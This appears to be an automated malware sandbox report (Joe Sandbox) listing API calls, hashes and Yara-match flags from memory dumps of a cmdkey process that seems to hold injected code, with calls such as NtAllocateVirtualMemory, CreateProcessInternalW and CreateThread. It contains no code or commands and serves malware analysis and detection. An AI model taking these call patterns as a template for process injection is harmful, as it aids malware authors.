                                                  • NtAllocateVirtualMemory.NTDLL(00A41E3E,?,00A5813F,00000000,00000004,00003000,?,?,?,?,?,00A5813F,00A41E3E), ref: 00A59738
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140482656730.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_a30000_cmdkey.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateMemoryVirtual
                                                  • String ID:
                                                  • API String ID: 2167126740-0
                                                  • Opcode ID: 99c28b6f836bd7f1fb3103be4ba1a38a236ed1443ace24b26726f51e3104ef92
                                                  • Instruction ID: 4547eebd367ad63eb15dbfd304677b2b34b54359a4443d730fcfab75c4c3c4bf
                                                  • Opcode Fuzzy Hash: 99c28b6f836bd7f1fb3103be4ba1a38a236ed1443ace24b26726f51e3104ef92
                                                  • Instruction Fuzzy Hash: 632108B5A00208AFDB10DF98CC81EEF77B9EF88700F108209FD18AB241D734A911CBA5
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140482656730.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_a30000_cmdkey.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DeleteFile
                                                  • String ID:
                                                  • API String ID: 4033686569-0
                                                  • Opcode ID: e27229d037b06a3256107adad20ad3048269b43c53fba6a8d67c1a7a5e616ca3
                                                  • Instruction ID: 7c457f4de5119c2c9bdf6a8f88fa511bb9c3512c87cb7c1483a2c1f90ff2c6e9
                                                  • Opcode Fuzzy Hash: e27229d037b06a3256107adad20ad3048269b43c53fba6a8d67c1a7a5e616ca3
                                                  • Instruction Fuzzy Hash: 9C11A371A00204BED620EB64CC42FEF77ACEF84714F108109FD18A7281D77479068BB5
                                                  APIs
                                                  • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00A59534
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140482656730.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_a30000_cmdkey.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Close
                                                  • String ID:
                                                  • API String ID: 3535843008-0
                                                  • Opcode ID: 1d059be34a1983e242e36b498dc5b26b0b02f47ccae493070fbce90df4a1fadc
                                                  • Instruction ID: 16a783c9a2ee7c0d79ac81bfb170d8e7620f31c239a90deac70b94c1a93f9c8c
                                                  • Opcode Fuzzy Hash: 1d059be34a1983e242e36b498dc5b26b0b02f47ccae493070fbce90df4a1fadc
                                                  • Instruction Fuzzy Hash: 95E08C76200214BBC620FA59DC01F9B7BACDFC5720F518415FA0CA7242C674B915C7F4
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140485563922.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                  • Associated: 00000005.00000002.140485563922.0000000003509000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.140485563922.000000000350D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_33e0000_cmdkey.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 743b8acba3bd9f0d6045f8c7a51f3daa37f62981b2463e9f368ceaf4325b7a60
                                                  • Instruction ID: 949a3445982cc140b57f4727b90347cab4fff5a17840a22858b450e23a9c7d6b
                                                  • Opcode Fuzzy Hash: 743b8acba3bd9f0d6045f8c7a51f3daa37f62981b2463e9f368ceaf4325b7a60
                                                  • Instruction Fuzzy Hash: EF900231605404129580B5584984546410597E0305B51D416E0414954CCB248D566367
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140485563922.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                  • Associated: 00000005.00000002.140485563922.0000000003509000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.140485563922.000000000350D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_33e0000_cmdkey.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 5a08c5fbf436db568711184f7a8460c945837234e44a7dbad33a6687e18352b6
                                                  • Instruction ID: 1dc1ee60cfccf6780fb5f982420b1a586d83b9714d4778d03cffcbad07e6839f
                                                  • Opcode Fuzzy Hash: 5a08c5fbf436db568711184f7a8460c945837234e44a7dbad33a6687e18352b6
                                                  • Instruction Fuzzy Hash: A3900261601104424580B5584904406610597E1305391D51AA0544960CC7288C55A26F
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140485563922.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                  • Associated: 00000005.00000002.140485563922.0000000003509000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.140485563922.000000000350D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_33e0000_cmdkey.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: b5da4f75c7e9599a3222dc80a78a4d4b3481014d48ecf2798afcf49068f6cd71
                                                  • Instruction ID: 67aac8d29140c2da67a6c538bb753bcf0b9293dcabff7c9553d8e0ea76a867ab
                                                  • Opcode Fuzzy Hash: b5da4f75c7e9599a3222dc80a78a4d4b3481014d48ecf2798afcf49068f6cd71
                                                  • Instruction Fuzzy Hash: 1290023160510802D540A5584614706110587D0205F61D816A0414968DC7A58D5175A7
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140485563922.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                  • Associated: 00000005.00000002.140485563922.0000000003509000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.140485563922.000000000350D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_33e0000_cmdkey.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 3c4c39568355b53f4f87326e0c92f6a0cd180d92a0e95dfda80a3eed6f64bdac
                                                  • Instruction ID: 9fa2bcc9435096aa07d2573d13377da1cfd952c0b5ac1edb15a2f86693b05e8b
                                                  • Opcode Fuzzy Hash: 3c4c39568355b53f4f87326e0c92f6a0cd180d92a0e95dfda80a3eed6f64bdac
                                                  • Instruction Fuzzy Hash: 9A90023120504C42D580B5584504A46011587D0309F51D416A0054A94DD7358D55B667
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140485563922.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                  • Associated: 00000005.00000002.140485563922.0000000003509000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.140485563922.000000000350D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_33e0000_cmdkey.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: ba9355549c2aeaf97935d333abbf2c2a948112ffa3889c8a81181b6f524ec31d
                                                  • Instruction ID: 45a741a2340b23121ec7e5d537e2d93f50f2da481222a7a00ec288b531bb5721
                                                  • Opcode Fuzzy Hash: ba9355549c2aeaf97935d333abbf2c2a948112ffa3889c8a81181b6f524ec31d
                                                  • Instruction Fuzzy Hash: F290023120100C02D5C0B558450464A010587D1305F91D41AA0015A54DCB258E5977A7
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140485563922.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                  • Associated: 00000005.00000002.140485563922.0000000003509000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.140485563922.000000000350D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_33e0000_cmdkey.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 950fd2a08bf2b57342d038fe613b16f0fddd9b627ee5cadb104b25f61db4e217
                                                  • Instruction ID: d21421ed29839efe5c9771c0c56e358defa41a4d6982761fc1f9c395ff421050
                                                  • Opcode Fuzzy Hash: 950fd2a08bf2b57342d038fe613b16f0fddd9b627ee5cadb104b25f61db4e217
                                                  • Instruction Fuzzy Hash: 4B90023120100802D540A9985508646010587E0305F51E416A5014955EC7758C917137
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140485563922.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                  • Associated: 00000005.00000002.140485563922.0000000003509000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.140485563922.000000000350D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_33e0000_cmdkey.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: c05bcbe40bd36bb526b2311b23af6077932b80301cb069739e2096a68aa1355a
                                                  • Instruction ID: cfd26b9ccee15116e05dde01a7cce2c734ac9bdfea55246f5824dd00b30ab41b
                                                  • Opcode Fuzzy Hash: c05bcbe40bd36bb526b2311b23af6077932b80301cb069739e2096a68aa1355a
                                                  • Instruction Fuzzy Hash: D690023120100C42D540A5584504B46010587E0305F51D41BA0114A54DC725CC517527
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140485563922.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                  • Associated: 00000005.00000002.140485563922.0000000003509000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.140485563922.000000000350D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_33e0000_cmdkey.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: daa2844bf58193548ec9bca1e80cc56454d95e62368b389729f7c349b4f470d7
                                                  • Instruction ID: a938c0115f1f94b21e833694483e0b9e285973f02496c0727728cfd4a9f8fb63
                                                  • Opcode Fuzzy Hash: daa2844bf58193548ec9bca1e80cc56454d95e62368b389729f7c349b4f470d7
                                                  • Instruction Fuzzy Hash: E690023120108C02D550A558850474A010587D0305F55D816A4414A58DC7A58C917127
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140485563922.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                  • Associated: 00000005.00000002.140485563922.0000000003509000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.140485563922.000000000350D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_33e0000_cmdkey.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: a53e0e4b622d70c1e09b3695c9989f7ca09d8c9ad586b395b2c4a73185cf3c3c
                                                  • Instruction ID: f9528016a88c91110a40a6be58eb1191775be7a1e89e4e26ba987ec1634850fd
                                                  • Opcode Fuzzy Hash: a53e0e4b622d70c1e09b3695c9989f7ca09d8c9ad586b395b2c4a73185cf3c3c
                                                  • Instruction Fuzzy Hash: E6900225221004020585E958070450B054597D6355391D41AF1406990CC7318C656327
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140485563922.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                  • Associated: 00000005.00000002.140485563922.0000000003509000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.140485563922.000000000350D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_33e0000_cmdkey.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: b0f0a9725947634dbf07f60ca071caf106dd8d891d66181556b78a14e6e01afb
                                                  • Instruction ID: ae63f832bfb2a88c01b102544046f192a774939d6625e93d7fd13befeb8bec6b
                                                  • Opcode Fuzzy Hash: b0f0a9725947634dbf07f60ca071caf106dd8d891d66181556b78a14e6e01afb
                                                  • Instruction Fuzzy Hash: D690023160500C02D590B5584514746010587D0305F51D416A0014A54DC7658E5576A7
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140485563922.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                  • Associated: 00000005.00000002.140485563922.0000000003509000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.140485563922.000000000350D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_33e0000_cmdkey.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: f18478a01cc26289584651de888bf851a55f5b4d871d0cd5231ec279fc8ef171
                                                  • Instruction ID: 6b43fe2f5ca367cf85bb97d235eb8a8f4da0dc450e08a487b9a2de58ed678fd2
                                                  • Opcode Fuzzy Hash: f18478a01cc26289584651de888bf851a55f5b4d871d0cd5231ec279fc8ef171
                                                  • Instruction Fuzzy Hash: FE900261202004034545B5584514616410A87E0205B51D426E1004990DC7358C91712B
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140485563922.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                  • Associated: 00000005.00000002.140485563922.0000000003509000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.140485563922.000000000350D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_33e0000_cmdkey.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: dd7bd1e17ee74467ab0ea74afa063a7d9469ce7f8da013661aadfeba580e05c0
                                                  • Instruction ID: 849ca16b8967a24824fefa1f765f1fef9926108d1ad14e0293c0193574b481dd
                                                  • Opcode Fuzzy Hash: dd7bd1e17ee74467ab0ea74afa063a7d9469ce7f8da013661aadfeba580e05c0
                                                  • Instruction Fuzzy Hash: 2D900435311004030545FD5C07045070147C7D5355351D437F1005D50CD731CC717137
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140485563922.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                  • Associated: 00000005.00000002.140485563922.0000000003509000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.140485563922.000000000350D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_33e0000_cmdkey.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 6b356f5aa686fdd10625463cd9d307cbcfeb291f684d115ffdfed6c5831d20b3
                                                  • Instruction ID: 9318ebc15179912a483e8a47eddef40cd58a8ccc1a7a6451902594a5d48f1b02
                                                  • Opcode Fuzzy Hash: 6b356f5aa686fdd10625463cd9d307cbcfeb291f684d115ffdfed6c5831d20b3
                                                  • Instruction Fuzzy Hash: 5890022124505502D590B55C45046164105A7E0205F51D426A0804994DC7658C557227
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140485563922.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                  • Associated: 00000005.00000002.140485563922.0000000003509000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.140485563922.000000000350D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_33e0000_cmdkey.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 6106bc5574459450fcfcff40170425f52babc2ea1666293f747553a13c89baea
                                                  • Instruction ID: 0d72fe67856386d20ed62f9302b90046a279c75f1e9ec51c918478e6a107e698
                                                  • Opcode Fuzzy Hash: 6106bc5574459450fcfcff40170425f52babc2ea1666293f747553a13c89baea
                                                  • Instruction Fuzzy Hash: D890022121180442D640A9684D14B07010587D0307F51D51AA0144954CCB258C616527
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140485563922.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                  • Associated: 00000005.00000002.140485563922.0000000003509000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.140485563922.000000000350D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_33e0000_cmdkey.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 32719123fdf77483877f29324104fd28504862c808bab949b85778c2e3d35842
                                                  • Instruction ID: 539895a4954a20e97574da6f888456e285a6b29d4f1f98cbbeded3d619211c9d
                                                  • Opcode Fuzzy Hash: 32719123fdf77483877f29324104fd28504862c808bab949b85778c2e3d35842
                                                  • Instruction Fuzzy Hash: E190026134100842D540A5584514B060105C7E1305F51D41AE1054954DC729CC52712B
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140485563922.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                  • Associated: 00000005.00000002.140485563922.0000000003509000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.140485563922.000000000350D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_33e0000_cmdkey.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: e6b9b9daabeb93a6ab51b24948badd996b74d02ba5719886f78e8881809e1e93
                                                  • Instruction ID: 70fd4da229c540169663173fef7e476f642ad39fceefdee5a25125737f9728e0
                                                  • Opcode Fuzzy Hash: e6b9b9daabeb93a6ab51b24948badd996b74d02ba5719886f78e8881809e1e93
                                                  • Instruction Fuzzy Hash: B390026120140803D580A9584904607010587D0306F51D416A2054955ECB398C51713B
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140485563922.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                  • Associated: 00000005.00000002.140485563922.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.140485563922.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_33e0000_cmdkey.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 34ec324df28dafa8f85b94836622a27178ef623419aabea4301c740e953255f4
                                                  • Instruction ID: 793d33c4354c77c4ff7b1836a109da4157cb3f03306b9d1880100ea168ed1cd8
                                                  • Opcode Fuzzy Hash: 34ec324df28dafa8f85b94836622a27178ef623419aabea4301c740e953255f4
                                                  • Instruction Fuzzy Hash: B1900221601004424580B56889449064105ABE1215751D526A0988950DC7698C65666B
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140485563922.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                  • Associated: 00000005.00000002.140485563922.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.140485563922.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_33e0000_cmdkey.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 8ed90acf90f78dc65cd2208a845a921633ee3ac81cab7df3e6eb12e62a83ad0b
                                                  • Instruction ID: 2794544e63f627df48b5c5a06a63b8dc08ecea64266260053075f92cf79375c3
                                                  • Opcode Fuzzy Hash: 8ed90acf90f78dc65cd2208a845a921633ee3ac81cab7df3e6eb12e62a83ad0b
                                                  • Instruction Fuzzy Hash: C790023120100813D551A5584604707010987D0245F91D817A0414958DD7668D52B127
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140485563922.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                  • Associated: 00000005.00000002.140485563922.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.140485563922.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_33e0000_cmdkey.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 8af4e67d956db252d505e13cf3ca4409a4d76856f2fdfa1ccbe5e0614a854753
                                                  • Instruction ID: 183a2f448085cb4bf135eeee1f0e3c9913af4b23d7bedf8efa6095cb74a262c5
                                                  • Opcode Fuzzy Hash: 8af4e67d956db252d505e13cf3ca4409a4d76856f2fdfa1ccbe5e0614a854753
                                                  • Instruction Fuzzy Hash: 3B90022160100902D541B5584504616010A87D0245F91D427A1014955ECB358D92B137
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140485563922.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                  • Associated: 00000005.00000002.140485563922.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.140485563922.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_33e0000_cmdkey.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 69783c33f9e567d29cedca3575a5eb95420d78909695031112224755da32c803
                                                  • Instruction ID: 672c03b7f04c50367310dc7b87345e27d91eb9ee5bfd11b261c3925242739d1b
                                                  • Opcode Fuzzy Hash: 69783c33f9e567d29cedca3575a5eb95420d78909695031112224755da32c803
                                                  • Instruction Fuzzy Hash: 2290022130100403D580B55855186064105D7E1305F51E416E0404954CDB258C566227
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140485563922.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                  • Associated: 00000005.00000002.140485563922.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.140485563922.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_33e0000_cmdkey.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 6817e3858342cdd7b10766228fd38f4b35baef4ec42e019f786cf35b0528d82c
                                                  • Instruction ID: 99d3ebe05f6cfef5f901e1435c085117d462428b6eadf2024393967c58cbce00
                                                  • Opcode Fuzzy Hash: 6817e3858342cdd7b10766228fd38f4b35baef4ec42e019f786cf35b0528d82c
                                                  • Instruction Fuzzy Hash: 5490022921300402D5C0B558550860A010587D1206F91E81AA0005958CCB258C696327
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140485563922.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                  • Associated: 00000005.00000002.140485563922.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.140485563922.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_33e0000_cmdkey.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: d1a74a92f8f568ef760d684a7bd00edf76e89e0f770a0c9a4ec2ca21bfb26bb6
                                                  • Instruction ID: d9878b7745b623be8007d923767f38e9eb826262e47a34ca86d89e241c6e1da1
                                                  • Opcode Fuzzy Hash: d1a74a92f8f568ef760d684a7bd00edf76e89e0f770a0c9a4ec2ca21bfb26bb6
                                                  • Instruction Fuzzy Hash: 83900221242045525985F5584504507410697E0245791D417A1404D50CC7369C56E627
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140485478255.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_3330000_cmdkey.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: MuW
                                                  • API String ID: 0-3612093263
                                                  APIs
                                                  • PostThreadMessageW.USER32(45-0FIUV,00000111,00000000,00000000), ref: 00A40ED7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140482656730.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_a30000_cmdkey.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MessagePostThread
                                                  • String ID: 45-0FIUV$45-0FIUV
                                                  • API String ID: 1836367815-1613426581
                                                  APIs
                                                  • Sleep.KERNELBASE(000007D0), ref: 00A53CEB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140482656730.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_a30000_cmdkey.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID: net.dll$wininet.dll
                                                  • API String ID: 3472027048-1269752229
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140482656730.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_a30000_cmdkey.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InitializeUninitialize
                                                  • String ID: @J7<
                                                  • API String ID: 3442037557-2016760708
                                                  APIs
                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00A44692
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140482656730.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_a30000_cmdkey.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Load
                                                  • String ID:
                                                  • API String ID: 2234796835-0
                                                  APIs
                                                  • CreateProcessInternalW.KERNELBASE(?,?,?,?,00A4844E,00000010,?,?,?,00000044,?,00000010,00A4844E,?,?,?), ref: 00A59963
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140482656730.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_a30000_cmdkey.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateInternalProcess
                                                  • String ID:
                                                  • API String ID: 2186235152-0
                                                  APIs
                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00A39B35
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.140482656730.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_a30000_cmdkey.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateThread
                                                  • String ID:
                                                  • API String ID: 2422867632-0
                                                  APIs
